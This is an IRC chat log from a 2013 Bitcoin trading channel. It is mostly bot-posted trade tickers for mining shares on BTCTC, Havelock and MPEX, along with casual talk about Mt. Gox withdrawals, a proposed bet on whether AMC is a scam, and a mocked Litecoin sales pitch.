00:26:27 True Jul 13 00:26:33 However until then Jul 13 00:26:34 I have about 300 shares on the way in Jul 13 00:26:34 [BTCTC] [BASIC-MINING] 3 @ 0.83 = 2.49 BTC [+] Jul 13 00:26:44 its one of those things where Jul 13 00:26:48 [BTCTC] [DMS.PURCHASE] 10 @ 0.040366 = 0.4037 BTC [-] Jul 13 00:26:48 if you dont trade there Jul 13 00:26:52 then it wont getbetter Jul 13 00:26:57 has to start somewhere Jul 13 00:27:24 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 13 00:27:25 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 13 00:27:28 i'm going to work with Havelock to do more promo too Jul 13 00:27:35 some people dont even know they exist Jul 13 00:27:52 They need more support that's for sure Jul 13 00:27:53 i will look into it, too, but the worst part in my opinion right now are those charts Jul 13 00:27:57 really a blocker Jul 13 00:28:10 are you having support issues Rulother? Jul 13 00:28:15 [BTCTC] [BASIC-MINING] 5 @ 0.83 = 4.15 BTC [+] Jul 13 00:28:26 all charts suck on every exchange Jul 13 00:28:31 BitFunder has the best Jul 13 00:28:32 but Jul 13 00:28:39 anything else is negotiable as long as the site runs more or less smooth Jul 13 00:28:43 thats why parseval started coinflow.coo Jul 13 00:28:43 yes, that's correct Jul 13 00:28:48 coinflow.co * Jul 13 00:28:53 Do love that site Jul 13 00:28:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.041899 = 0.1257 BTC [-] Jul 13 00:29:39 [HAVELOCK] [VTX] 1 @ 0.94999 BTC [+] Jul 13 00:32:00 [HAVELOCK] [SDSTM] 1 @ 0.0163 BTC [+] Jul 13 00:32:01 [HAVELOCK] [SDSTM] 99 @ 0.0164 = 1.6236 BTC [+] Jul 13 00:33:11 [HAVELOCK] [SDSTM] 19 @ 0.0164 = 0.3116 BTC [+] Jul 13 00:34:36 [HAVELOCK] [AM100] 219 @ 0.040998 = 8.9786 BTC [-] Jul 13 00:34:56 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [-] Jul 13 00:35:14 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.004144 = 0.1036 BTC [-] Jul 13 00:35:42 [BTCTC] [BASIC-MINING] 5 @ 0.83 = 4.15 BTC [+] Jul 13 00:36:27 [BTCTC] [DMS.SELLING] 18 @ 0.026998 = 0.486 BTC [-] Jul 13 00:37:00 [BTCTC] [BASIC-MINING] 2 @ 0.83 = 1.66 BTC [+] Jul 13 00:38:42 [BTCTC] [S.BBET-PT] 1 @ 0.002178 BTC [+] Jul 13 00:39:59 [HAVELOCK] [SDSTM] 1 @ 0.0164 BTC [+] Jul 13 00:40:34 [BTCTC] [S.BBET-PT] 8 @ 0.002179 = 0.0174 BTC [+] Jul 13 00:42:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.042465 BTC [+] Jul 13 00:43:23 [BTCTC] [BITVPS] 1 @ 0.001901 BTC [-] Jul 13 00:43:26 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 13 00:44:21 [BTCTC] [TAT.ASICMINER] 26 @ 0.041605 = 1.0817 BTC [-] Jul 13 00:44:55 [HAVELOCK] [SDSTM] 1 @ 0.0164 BTC [+] Jul 13 00:45:29 [BTCTC] [BASIC-MINING] 1 @ 0.83 BTC [+] Jul 13 00:45:40 [HAVELOCK] [AM100] 81 @ 0.040998 = 3.3208 BTC [-] Jul 13 00:47:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.042462 BTC [+] Jul 13 00:47:48 [BTCTC] [AMC-PT] 10 @ 0.002481 = 0.0248 BTC [-] Jul 13 00:47:50 [BTCTC] [AMC-PT] 52 @ 0.00248 = 0.129 BTC [-] Jul 13 00:48:00 [BTCTC] [PAJKA.BOND] 4 @ 0.05 = 0.2 BTC [+] Jul 13 00:49:33 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004144 = 0.0083 BTC [-] Jul 13 00:50:00 [BTCTC] [S.BBET-PT] 1 @ 0.002179 BTC [+] Jul 13 00:51:16 [BTCTC] [DMS.SELLING] 2 @ 0.026998 = 0.054 BTC [-] Jul 13 00:52:26 [BTCTC] [DMS.SELLING] 13 @ 0.026998 = 0.351 BTC [-] Jul 13 00:53:56 [BTCTC] [DMS.PURCHASE] 22 @ 0.040366 = 0.8881 BTC [-] Jul 13 00:54:35 [BTCTC] [ASICMINER-PT] 1 @ 4.173001 BTC [-] Jul 13 00:55:08 [HAVELOCK] [AM100] 63 @ 0.040998 = 2.5829 BTC [-] Jul 13 00:56:20 [BTCTC] [BASIC-MINING] 5 @ 0.83 = 4.15 BTC [+] Jul 13 00:57:12 [HAVELOCK] [AM100] 45 @ 0.040999 = 1.845 BTC [+] Jul 13 00:57:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.042459 = 0.1274 BTC [-] Jul 13 00:57:47 [HAVELOCK] [AM100] 31 @ 0.040999 = 1.271 BTC [+] Jul 13 00:58:01 [BTCTC] [ASICMINER-PT] 1 @ 4.173001 BTC [-] Jul 13 00:58:28 [BTCTC] [ASICMINER-PT] 1 @ 4.173001 BTC [-] Jul 13 01:00:05 [BTCTC] [ASICMINER-PT] 1 @ 4.173 BTC [-] Jul 13 01:01:27 [BTCTC] [BITVPS] 1 @ 0.002 BTC [+] Jul 13 01:02:03 [BTCTC] [BASIC-MINING] 10 @ 0.805001 = 8.05 BTC [-] Jul 13 01:03:37 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004144 = 0.0124 BTC [-] Jul 13 01:05:33 i wasnt paying attention. what are some of the reasons for the uptrend the past couple days? Jul 13 01:07:05 ;;ticker Jul 13 01:07:05 MtGox BTCUSD ticker | Best bid: 93.44352, Best ask: 93.49999, Bid-ask spread: 0.05647, Last trade: 93.44352, 24 hour volume: 102294.00990338, 24 hour low: 87.56000, 24 hour high: 104.17188, 24 hour vwap: 96.25806 Jul 13 01:07:15 gesell: mtgox has begun processing usd Jul 13 01:07:33 withdrawals Jul 13 01:07:46 [BTCTC] [TAT.ASICMINER] 12 @ 0.042456 = 0.5095 BTC [-] Jul 13 01:07:53 they froze all their usd accounts after the dwolla seizure and USD transfers became illiquid Jul 13 01:07:56 I wanna do an AMC is a Scam BitBet, how should I word this? Jul 13 01:08:03 this is what I have so far Jul 13 01:08:03 The set off assets and companies known as AMC/VMC/ActiveMiner, run by Ken Slaughter will either be proven as a scam, or never pay out more than 0.00075 in total dividends per all shares issued as of April 1st, 2014. Jul 13 01:08:05 50 never came and thus people moved their bids and pushed the price Jul 13 01:08:05 [HAVELOCK] [AM100] 11 @ 0.041 = 0.451 BTC [+] Jul 13 01:08:06 of* Jul 13 01:08:07 [HAVELOCK] [AM100] 19 @ 0.040999 = 0.779 BTC [-] Jul 13 01:08:17 [HAVELOCK] [AM100] 9 @ 0.040998 = 0.369 BTC [-] Jul 13 01:09:16 thestringpuller: before this happened were usd transfers in also blocked? no, or? not sure why the ability to get money out of gox would cause price up trend Jul 13 01:09:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.042455 BTC [-] Jul 13 01:10:20 [HAVELOCK] [AM100] 10 @ 0.040999 = 0.41 BTC [+] Jul 13 01:10:38 you're evil, tat :p Jul 13 01:10:39 [HAVELOCK] [AM100] 3 @ 0.040999 = 0.123 BTC [+] Jul 13 01:10:46 gesell that I don't know but I know that it had a lot to do with the price drop Jul 13 01:10:56 this is the only way I can short AMC without buying any :) Jul 13 01:10:58 gesell because people buy btc to get that out. Jul 13 01:11:28 [HAVELOCK] [AM100] 2 @ 0.040999 = 0.082 BTC [+] Jul 13 01:11:43 buy btc to get btc out Jul 13 01:12:02 [BTCTC] [AMC-PT] 4 @ 0.002491 = 0.01 BTC [+] Jul 13 01:13:56 [BTCTC] [BASIC-MINING] 10 @ 0.819999 = 8.2 BTC [+] Jul 13 01:14:32 mircea_popescu: smickles contacted me but I can't decrypt his ciphertext Jul 13 01:14:34 WOE IS ME Jul 13 01:14:36 WOE IS ME Jul 13 01:15:10 lol k Jul 13 01:15:31 [BTCTC] [AMC-PT] 48 @ 0.00248 = 0.119 BTC [-] Jul 13 01:15:33 [BTCTC] [AMC-PT] 240 @ 0.00248 = 0.5952 BTC [-] Jul 13 01:15:37 [BTCTC] [AMC-PT] 100 @ 0.00247 = 0.247 BTC [-] Jul 13 01:15:38 [BTCTC] [AMC-PT] 100 @ 0.00246 = 0.246 BTC [-] Jul 13 01:15:57 [BTCTC] [ASICMINER-PT] 4 @ 4.173001 = 16.692 BTC [+] Jul 13 01:16:13 [HAVELOCK] [SDSTM] 51 @ 0.016 = 0.816 BTC [-] Jul 13 01:16:30 [BTCTC] [AMC-PT] 100 @ 0.00245 = 0.245 BTC [-] Jul 13 01:16:32 [BTCTC] [AMC-PT] 50 @ 0.002442 = 0.1221 BTC [-] Jul 13 01:16:33 [BTCTC] [AMC-PT] 100 @ 0.002441 = 0.2441 BTC [-] Jul 13 01:16:35 [BTCTC] [AMC-PT] 100 @ 0.00244 = 0.244 BTC [-] Jul 13 01:16:37 [BTCTC] [AMC-PT] 100 @ 0.00243 = 0.243 BTC [-] Jul 13 01:17:35 [BTCTC] [AMC-PT] 70 @ 0.00243 = 0.1701 BTC [-] Jul 13 01:18:04 [BTCTC] [BASIC-MINING] 1 @ 0.82 BTC [+] Jul 13 01:19:41 [BTCTC] [BASIC-MINING] 2 @ 0.83 = 1.66 BTC [+] Jul 13 01:22:47 [BTCTC] [ASICMINER-PT] 3 @ 4.173001 = 12.519 BTC [+] Jul 13 01:23:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.042452 = 0.1274 BTC [-] Jul 13 01:23:58 [BTCTC] [BASIC-MINING] 1 @ 0.805999 BTC [-] Jul 13 01:24:37 [BTCTC] [ASICMINER-PT] 1 @ 4.173001 BTC [+] Jul 13 01:25:15 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 13 01:26:08 [BTCTC] [ASICMINER-PT] 4 @ 4.173001 = 16.692 BTC [-] Jul 13 01:28:56 [BTCTC] [COGNITIVE] 1 @ 0.450999 BTC [+] Jul 13 01:29:54 [BTCTC] [DMS.MINING] 94 @ 0.014 = 1.316 BTC [-] Jul 13 01:30:07 [HAVELOCK] [AM100] 231 @ 0.040311 = 9.3118 BTC [-] Jul 13 01:30:09 [HAVELOCK] [AM100] 5 @ 0.04031001 = 0.2016 BTC [-] Jul 13 01:30:10 [HAVELOCK] [AM100] 50 @ 0.04031 = 2.0155 BTC [-] Jul 13 01:30:11 [HAVELOCK] [AM100] 716 @ 0.0403 = 28.8548 BTC [-] Jul 13 01:30:13 [HAVELOCK] [AM100] 223 @ 0.04 = 8.92 BTC [-] Jul 13 01:30:51 [BTCTC] [DMS.MINING] 19 @ 0.014 = 0.266 BTC [-] Jul 13 01:30:53 [BTCTC] [DMS.MINING] 1 @ 0.014 BTC [-] Jul 13 01:32:15 [BTCTC] [AMC-PT] 45 @ 0.002431 = 0.1094 BTC [+] Jul 13 01:32:27 [BTCTC] [BASIC-MINING] 14 @ 0.805999 = 11.284 BTC [-] Jul 13 01:32:45 [BTCTC] [AMC-PT] 250 @ 0.002425 = 0.6063 BTC [-] Jul 13 01:33:16 [BTCTC] [BASIC-MINING] 10 @ 0.85 = 8.5 BTC [+] Jul 13 01:33:17 [BTCTC] [AMC-PT] 3 @ 0.00242 = 0.0073 BTC [-] Jul 13 01:33:20 [BTCTC] [AMC-PT] 250 @ 0.00242 = 0.605 BTC [-] Jul 13 01:33:33 [BTCTC] [DMS.PURCHASE] 39 @ 0.040366 = 1.5743 BTC [-] Jul 13 01:34:03 [BTCTC] [BASIC-MINING] 10 @ 0.88 = 8.8 BTC [+] Jul 13 01:34:06 [BTCTC] [AMC-PT] 252 @ 0.002405 = 0.6061 BTC [-] Jul 13 01:34:51 [BTCTC] [BASIC-MINING] 15 @ 0.8999 = 13.4985 BTC [+] Jul 13 01:35:47 [BTCTC] [BASIC-MINING] 3 @ 0.9 = 2.7 BTC [+] Jul 13 01:36:05 [MPEX] [S.MPOE] 15801 @ 0.00083097 = 13.1302 BTC [+] Jul 13 01:36:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.042448 = 0.4245 BTC [-] Jul 13 01:36:38 [HAVELOCK] [AM100] 100 @ 0.03925 = 3.925 BTC [-] Jul 13 01:36:39 [HAVELOCK] [AM100] 50 @ 0.039221 = 1.9611 BTC [-] Jul 13 01:36:41 [HAVELOCK] [AM100] 178 @ 0.03921 = 6.9794 BTC [-] Jul 13 01:36:42 [HAVELOCK] [AM100] 8 @ 0.039205 = 0.3136 BTC [-] Jul 13 01:36:43 [HAVELOCK] [AM100] 464 @ 0.0392 = 18.1888 BTC [-] Jul 13 01:36:45 [HAVELOCK] [AM100] 9 @ 0.040999 = 0.369 BTC [+] Jul 13 01:37:11 [BTCTC] [AMC-PT] 70 @ 0.002499 = 0.1749 BTC [+] Jul 13 01:38:13 [BTCTC] [AMC-PT] 2030 @ 0.0025 = 5.075 BTC [+] Jul 13 01:39:24 [HAVELOCK] [AM100] 75 @ 0.040999 = 3.0749 BTC [+] Jul 13 01:39:44 Hmmmm Jul 13 01:41:16 [HAVELOCK] [AM100] 53 @ 0.040999 = 2.1729 BTC [+] Jul 13 01:41:18 [HAVELOCK] [AM100] 22 @ 0.040999 = 0.902 BTC [+] Jul 13 01:41:30 [HAVELOCK] [AM100] 10 @ 0.040999 = 0.41 BTC [+] Jul 13 01:41:40 [HAVELOCK] [AM100] 10 @ 0.040999 = 0.41 BTC [+] Jul 13 01:41:50 [HAVELOCK] [AM100] 7 @ 0.040999 = 0.287 BTC [+] Jul 13 01:41:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] Jul 13 01:42:52 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 13 01:43:13 [00:41] <@assbot> [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] < ?!?!?!? Jul 13 01:43:31 nvm.. option Jul 13 01:44:19 [HAVELOCK] [SDSTM] 1 @ 0.0125 BTC [-] Jul 13 01:44:57 [BTCTC] [GSDPT] 18 @ 0.002071 = 0.0373 BTC [-] Jul 13 01:45:18 [BTCTC] [DMS.SELLING] 4 @ 0.0265 = 0.106 BTC [-] Jul 13 01:46:58 [BTCTC] [DMS.SELLING] 17 @ 0.0265 = 0.4505 BTC [-] Jul 13 01:48:18 [BTCTC] [MININGCO.ETF] 2 @ 1.399999 = 2.8 BTC [+] Jul 13 01:48:20 [BTCTC] [MININGCO.ETF] 1 @ 1.4 BTC [+] Jul 13 01:49:27 [BTCTC] [MININGCO.ETF] 1 @ 1.5 BTC [+] Jul 13 01:49:38 ThickAsThieves, do the scam bet ill definitely throw some btc at it Jul 13 01:51:30 [BTCTC] [DMS.SELLING] 2 @ 0.026991 = 0.054 BTC [+] Jul 13 01:52:28 [BTCTC] [AMC-PT] 2 @ 0.0022 = 0.0044 BTC [-] Jul 13 01:52:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004142 BTC [-] Jul 13 01:53:48 [BTCTC] [DMS.MINING] 98 @ 0.014242 = 1.3957 BTC [+] Jul 13 01:53:50 [BTCTC] [DMS.MINING] 20 @ 0.014243 = 0.2849 BTC [+] Jul 13 01:53:51 [BTCTC] [DMS.MINING] 82 @ 0.0144 = 1.1808 BTC [+] Jul 13 01:55:01 [BTCTC] [AMC-PT] 2 @ 0.002421 = 0.0048 BTC [+] Jul 13 01:55:23 [BTCTC] [AMC-PT] 2 @ 0.0022 = 0.0044 BTC [-] Jul 13 01:55:42 [BTCTC] [AMC-PT] 2 @ 0.002421 = 0.0048 BTC [+] Jul 13 01:56:19 [BTCTC] [AMC-PT] 2 @ 0.0022 = 0.0044 BTC [-] Jul 13 01:56:40 [BTCTC] [AMC-PT] 2 @ 0.002421 = 0.0048 BTC [+] Jul 13 01:57:02 [BTCTC] [AMC-PT] 2 @ 0.0022 = 0.0044 BTC [-] Jul 13 01:57:19 [BTCTC] [AMC-PT] 2 @ 0.002421 = 0.0048 BTC [+] Jul 13 01:57:38 [BTCTC] [AMC-PT] 3 @ 0.0022 = 0.0066 BTC [-] Jul 13 01:58:01 [BTCTC] [AMC-PT] 3 @ 0.002421 = 0.0073 BTC [+] Jul 13 01:58:24 [BTCTC] [AMC-PT] 3 @ 0.0022 = 0.0066 BTC [-] Jul 13 01:58:44 [BTCTC] [AMC-PT] 3 @ 0.002421 = 0.0073 BTC [+] Jul 13 01:59:02 [BTCTC] [AMC-PT] 3 @ 0.0022 = 0.0066 BTC [-] Jul 13 01:59:15 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 13 01:59:34 [BTCTC] [AMC-PT] 3 @ 0.002421 = 0.0073 BTC [-] Jul 13 02:00:01 [BTCTC] [AMC-PT] 3 @ 0.0022 = 0.0066 BTC [-] Jul 13 02:00:26 [BTCTC] [AMC-PT] 3 @ 0.002421 = 0.0073 BTC [+] Jul 13 02:00:49 [BTCTC] [AMC-PT] 4 @ 0.0022 = 0.0088 BTC [-] Jul 13 02:01:19 [BTCTC] [AMC-PT] 4 @ 0.002421 = 0.0097 BTC [+] Jul 13 02:01:41 [BTCTC] [DMS.SELLING] 28 @ 0.0265 = 0.742 BTC [-] Jul 13 02:01:45 [BTCTC] [AMC-PT] 4 @ 0.0022 = 0.0088 BTC [-] Jul 13 02:03:22 [BTCTC] [AMC-PT] 4 @ 0.002421 = 0.0097 BTC [+] Jul 13 02:04:03 mircea_popescu what up foo? Jul 13 02:06:17 [BTCTC] [DMS.MINING] 20 @ 0.014 = 0.28 BTC [-] Jul 13 02:06:41 [BTCTC] [DMS.SELLING] 20 @ 0.0265 = 0.53 BTC [-] Jul 13 02:06:48 [BTCTC] [DMS.SELLING] 3 @ 0.0265 = 0.0795 BTC [-] Jul 13 02:08:08 [BTCTC] [BASIC-MINING] 7 @ 0.9 = 6.3 BTC [+] Jul 13 02:08:13 [BTCTC] [BASIC-MINING] 1 @ 0.9 BTC [+] Jul 13 02:08:14 [BTCTC] [COGNITIVE] 1 @ 0.450999 BTC [+] Jul 13 02:08:16 [BTCTC] [BASIC-MINING] 2 @ 0.9 = 1.8 BTC [+] Jul 13 02:08:33 [BTCTC] [COGNITIVE] 1 @ 0.451 BTC [+] Jul 13 02:08:41 [HAVELOCK] [AM100] 22 @ 0.040749 = 0.8965 BTC [-] Jul 13 02:08:52 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 13 02:09:01 [MPEX] [S.MPOE] 7199 @ 0.00083097 = 5.9822 BTC [+] Jul 13 02:09:03 [BTCTC] [DMS.PURCHASE] 9 @ 0.040366 = 0.3633 BTC [-] Jul 13 02:10:13 [HAVELOCK] [AM100] 59 @ 0.040749 = 2.4042 BTC [-] Jul 13 02:11:27 [HAVELOCK] [AM1] 1 @ 4.29 BTC [-] Jul 13 02:11:36 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.004142 = 0.0456 BTC [-] Jul 13 02:11:37 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.004143 = 0.1616 BTC [+] Jul 13 02:13:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.042001 = 0.21 BTC [+] Jul 13 02:14:27 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [-] Jul 13 02:14:29 [BTCTC] [ASICMINER-PT] 1 @ 4.152 BTC [-] Jul 13 02:14:30 [BTCTC] [ASICMINER-PT] 2 @ 4.1501 = 8.3002 BTC [-] Jul 13 02:15:44 [BTCTC] [BASIC-MINING] 1 @ 0.91 BTC [+] Jul 13 02:15:46 [BTCTC] [BASIC-MINING] 10 @ 0.92 = 9.2 BTC [+] Jul 13 02:15:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.042001 = 0.126 BTC [+] Jul 13 02:15:49 [BTCTC] [BASIC-MINING] 1 @ 0.9275 BTC [+] Jul 13 02:15:50 [BTCTC] [BASIC-MINING] 5 @ 0.929 = 4.645 BTC [+] Jul 13 02:18:46 [BTCTC] [BASIC-MINING] 2 @ 0.93 = 1.86 BTC [+] Jul 13 02:20:58 [BTCTC] [TAT.ASICMINER] 14 @ 0.042433 = 0.5941 BTC [+] Jul 13 02:26:45 [BTCTC] [DMS.SELLING] 78 @ 0.0265 = 2.067 BTC [-] Jul 13 02:26:56 [BTCTC] [DMS.SELLING] 8 @ 0.02699 = 0.2159 BTC [+] Jul 13 02:27:28 [BTCTC] [AMC-PT] 2 @ 0.002499 = 0.005 BTC [-] Jul 13 02:27:44 [BTCTC] [AMC-PT] 26 @ 0.002499 = 0.065 BTC [-] Jul 13 02:27:46 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 13 02:28:36 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 13 02:29:12 [BTCTC] [COGNITIVE] 1 @ 0.485999 BTC [+] Jul 13 02:30:19 [BTCTC] [TAT.ASICMINER] 33 @ 0.042004 = 1.3861 BTC [-] Jul 13 02:33:10 [BTCTC] [TAT.ASICMINER] 16 @ 0.042 = 0.672 BTC [-] Jul 13 02:34:09 [HAVELOCK] [AM100] 28 @ 0.040749 = 1.141 BTC [-] Jul 13 02:34:38 [BTCTC] [TAT.ASICMINER] 9 @ 0.042 = 0.378 BTC [-] Jul 13 02:35:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.0419 = 0.3352 BTC [-] Jul 13 02:36:24 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 13 02:36:37 [BTCTC] [BASIC-MINING] 2 @ 0.89 = 1.78 BTC [-] Jul 13 02:36:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0419 BTC [-] Jul 13 02:37:45 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004143 = 0.0414 BTC [+] Jul 13 02:38:41 [BTCTC] [PAJKA.BOND] 2 @ 0.0453 = 0.0906 BTC [-] Jul 13 02:39:34 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.004143 = 0.0911 BTC [+] Jul 13 02:43:12 [BTCTC] [COGNITIVE] 1 @ 0.486 BTC [+] Jul 13 02:44:00 [BTCTC] [DMS.PURCHASE] 5 @ 0.040366 = 0.2018 BTC [-] Jul 13 02:51:41 [BTCTC] [S.MPOE-PT] 1 @ 0.000938 BTC [+] Jul 13 02:54:07 [HAVELOCK] [AM100] 10 @ 0.0405 = 0.405 BTC [-] Jul 13 02:58:21 [BTCTC] [TAT.ASICMINER] 10 @ 0.042421 = 0.4242 BTC [+] Jul 13 02:58:42 [MPEX] [S.MPOE] 39900 @ 0.00083066 = 33.1433 BTC [-] Jul 13 03:01:25 [HAVELOCK] [AM100] 58 @ 0.04028 = 2.3362 BTC [-] Jul 13 03:07:29 [HAVELOCK] [SDSTM] 100 @ 0.0150001 = 1.5 BTC [+] Jul 13 03:07:47 [HAVELOCK] [SDSTM] 2 @ 0.015 = 0.03 BTC [-] Jul 13 03:08:30 [BTCTC] [BASIC-MINING] 4 @ 0.89 = 3.56 BTC [-] Jul 13 03:09:32 [BTCTC] [AMC-PT] 307 @ 0.0025 = 0.7675 BTC [+] Jul 13 03:12:11 [HAVELOCK] [AM100] 2 @ 0.040749 = 0.0815 BTC [+] Jul 13 03:26:32 [BTCTC] [AMC-PT] 1 @ 0.002422 BTC [-] Jul 13 03:27:36 [HAVELOCK] [SDSTM] 100 @ 0.01351 = 1.351 BTC [-] Jul 13 03:27:59 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [+] Jul 13 03:28:26 [HAVELOCK] [SDSTM] 50 @ 0.0133 = 0.665 BTC [-] Jul 13 03:28:36 [BTCTC] [ASICMINER-PT] 3 @ 4.15 = 12.45 BTC [-] Jul 13 03:29:21 [HAVELOCK] [SDSTM] 3 @ 0.0132 = 0.0396 BTC [-] Jul 13 03:29:33 [HAVELOCK] [SDSTM] 3 @ 0.013 = 0.039 BTC [-] Jul 13 03:29:41 [BTCTC] [BASIC-MINING] 3 @ 0.885 = 2.655 BTC [-] Jul 13 03:29:54 [HAVELOCK] [SDSTM] 3 @ 0.0126 = 0.0378 BTC [-] Jul 13 03:30:15 [HAVELOCK] [SDSTM] 2 @ 0.0125 = 0.025 BTC [-] Jul 13 03:30:17 [HAVELOCK] [SDSTM] 1 @ 0.0125 BTC [-] Jul 13 03:30:34 [HAVELOCK] [SDSTM] 10 @ 0.0125 = 0.125 BTC [-] Jul 13 03:32:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.042409 = 0.0848 BTC [-] Jul 13 03:35:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.0419 = 0.1257 BTC [-] Jul 13 03:36:13 "I'm selling 1 LTC (Litecoin) for 0.07 BTC (Bitcoin) Jul 13 03:36:13 I am a trusted seller with a good trading history and verified ID. Jul 13 03:36:13 This is a new an up coming crypto-currency with many advantages over Bitcoin. The main advantage is the current market price. So grab some before the price rockets." Jul 13 03:36:45 Uh uh... the current market price is the main advantage of LTC, apparently. Jul 13 03:38:25 [HAVELOCK] [SDSTM] 3 @ 0.0154 = 0.0462 BTC [+] Jul 13 03:41:17 [BTCTC] [DMS.MINING] 18 @ 0.0144 = 0.2592 BTC [+] Jul 13 03:41:19 [BTCTC] [DMS.MINING] 85 @ 0.014999 = 1.2749 BTC [+] Jul 13 03:41:40 [BTCTC] [DMS.MINING] 17 @ 0.015 = 0.255 BTC [+] Jul 13 03:43:13 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0041 = 0.205 BTC [-] Jul 13 03:44:24 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.004143 = 0.1823 BTC [+] Jul 13 03:45:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.0419 = 0.419 BTC [-] Jul 13 03:45:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.0419 = 0.5028 BTC [-] Jul 13 03:46:31 [HAVELOCK] [SDSTM] 300 @ 0.01260001 = 3.78 BTC [-] Jul 13 03:47:35 [BTCTC] [BFMINES] 125 @ 0.003999 = 0.4999 BTC [+] Jul 13 03:47:48 [BTCTC] [DMS.SELLING] 24 @ 0.026998 = 0.648 BTC [+] Jul 13 03:48:26 [BTCTC] [DMS.SELLING] 10 @ 0.026999 = 0.27 BTC [+] Jul 13 03:48:37 [BTCTC] [BASIC-MINING] 1 @ 0.885 BTC [-] Jul 13 03:49:15 [BTCTC] [BASIC-MINING] 6 @ 0.89 = 5.34 BTC [+] Jul 13 03:50:09 [BTCTC] [AMC-PT] 325 @ 0.0025 = 0.8125 BTC [+] Jul 13 03:53:09 [BTCTC] [BASIC-MINING] 2 @ 0.89 = 1.78 BTC [+] Jul 13 03:54:01 [BTCTC] [DMS.PURCHASE] 100 @ 0.040366 = 4.0366 BTC [-] Jul 13 03:57:13 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 13 03:58:08 [BTCTC] [DMS.PURCHASE] 48 @ 0.040366 = 1.9376 BTC [-] Jul 13 04:03:37 [BTCTC] [PAJKA.BOND] 10 @ 0.05 = 0.5 BTC [+] Jul 13 04:07:58 lol Jul 13 04:08:04 the advantage of 0.07! Jul 13 04:08:07 rule of cool. Jul 13 04:10:50 [BTCTC] [DMS.SELLING] 75 @ 0.02675 = 2.0063 BTC [-] Jul 13 04:11:49 [BTCTC] [DMS.SELLING] 20 @ 0.026997 = 0.5399 BTC [+] Jul 13 04:12:41 mircea_popescu: can I get some trilema credits? Jul 13 04:13:12 NO?!? Jul 13 04:13:14 I see how it is. Jul 13 04:13:19 lolwut ? Jul 13 04:13:38 pm another address I will send a dollar of btc real quick Jul 13 04:13:38 y0u may need to reset cookies as i've moved domains. Jul 13 04:13:39 ;;ticker Jul 13 04:13:39 MtGox BTCUSD ticker | Best bid: 91.02800, Best ask: 91.70000, Bid-ask spread: 0.67200, Last trade: 91.70000, 24 hour volume: 102126.11762763, 24 hour low: 89.20000, 24 hour high: 104.17188, 24 hour vwap: 96.44065 Jul 13 04:13:44 try that first. Jul 13 04:13:50 I don't have the original code you gave me Jul 13 04:14:01 so I can't reset the cookies manually Jul 13 04:14:04 it's like losing a private key Jul 13 04:14:07 I'm bad about back ups Jul 13 04:14:10 I'ma start being better about that Jul 13 04:14:19 [BTCTC] [B.YABMC] 3 @ 0.002499 = 0.0075 BTC [-] Jul 13 04:14:44 ;;calc 1/90 Jul 13 04:14:44 0.0111111111111 Jul 13 04:15:05 gotta love those repeating digits Jul 13 04:17:02 but yea can I get some more credits I will save the cookie info this time and store it on a thumb drive then shove that thumb drive up my ass for safe keeping Jul 13 04:18:16 [BTCTC] [ASICMINER-PT] 1 @ 4.219999 BTC [+] Jul 13 04:18:26 [BTCTC] [ASICMINER-PT] 2 @ 4.22 = 8.44 BTC [+] Jul 13 04:20:59 [MPEX] [S.MPOE] 17300 @ 0.00082524 = 14.2767 BTC [-] Jul 13 04:25:38 [HAVELOCK] [AM100] 4 @ 0.04098 = 0.1639 BTC [+] Jul 13 04:25:52 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [+] Jul 13 04:27:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004145 BTC [+] Jul 13 04:27:16 [BTCTC] [TAT.VIRTUALMINE] 400 @ 0.004146 = 1.6584 BTC [+] Jul 13 04:27:19 [BTCTC] [TAT.VIRTUALMINE] 399 @ 0.004147 = 1.6547 BTC [+] Jul 13 04:29:43 [BTCTC] [BASIC-MINING] 5 @ 0.875013 = 4.3751 BTC [-] Jul 13 04:30:01 [HAVELOCK] [SDSTM] 10 @ 0.01499 = 0.1499 BTC [+] Jul 13 04:30:17 [HAVELOCK] [SDSTM] 4 @ 0.01499 = 0.06 BTC [+] Jul 13 